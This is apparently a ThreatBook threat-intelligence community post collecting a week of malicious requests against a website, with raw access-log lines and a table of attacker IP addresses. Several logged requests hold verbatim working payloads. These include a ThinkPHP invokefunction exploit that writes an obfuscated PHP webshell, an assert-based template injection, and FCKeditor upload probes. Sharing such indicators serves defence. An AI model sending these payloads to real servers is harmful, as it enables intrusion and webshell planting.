threatBookbuxia
IOC 9

threatBookthreatBook

扫描sql注入web应用漏洞利用
近期网站恶意访问ip收集
buxia
2020-01-14 10:35:12ThreatBook134
+ 关注

最近七天时间访问网站的恶意ip,攻击方式多种。

1.PNG

20200114024756 180.160.94.189 IP-address /phpinfo.php 6390 1050 2 404 NULL 66 "python-requests/2.22.0" "(null)" GET HTTPS miss

20200114024900 180.160.94.48 IP-address /phpinfo.php 6390 1050 2 404 NULL 83 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "(null)" GET HTTPS miss

20200112145317 114.239.105.38 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 360 120 2 403 http://IP-address/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 57 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200112080234 104.223.185.82 IP-address /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 418 -1 -1 403 http://IP-address/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 151 "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "(null)" POST HTTP/1.1 hit

20200111060704 222.94.163.75 IP-address /admins/diy.asp 521 120 2 301 NULL 41 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" "(null)" GET HTTP/1.1 miss

20200110135834 114.239.105.89 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 361 120 2 403 http://IP-address/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 64 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200110012813 122.51.78.36 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 361 4 2 403 http://IP-address/? 6 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200109211837 122.51.141.108 IP-address /utility/convert/index.php?a=config&source=d7.2_x2.0 557 4 2 301 NULL 52 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "(null)" GET HTTP/1.1 miss

20200108203401 112.252.98.70 IP-address /Config_Shell.php 22528 122 26 404 http://IP-address//Config_Shell.php 198 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTPS miss

20200108172853 49.89.249.255 IP-address /type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss 217 120 2 400 http://IP-address/type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss 1 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

展开全部ThreatBook

威胁指标(IOC)

IP端口域名样本标签
104.223.185.820003
112.252.98.700004
114.239.105.381104
114.239.105.890004
122.51.78.360003
查看全部9threatBook
1

评论

ThreatBook
已经到底了,没有更多内容了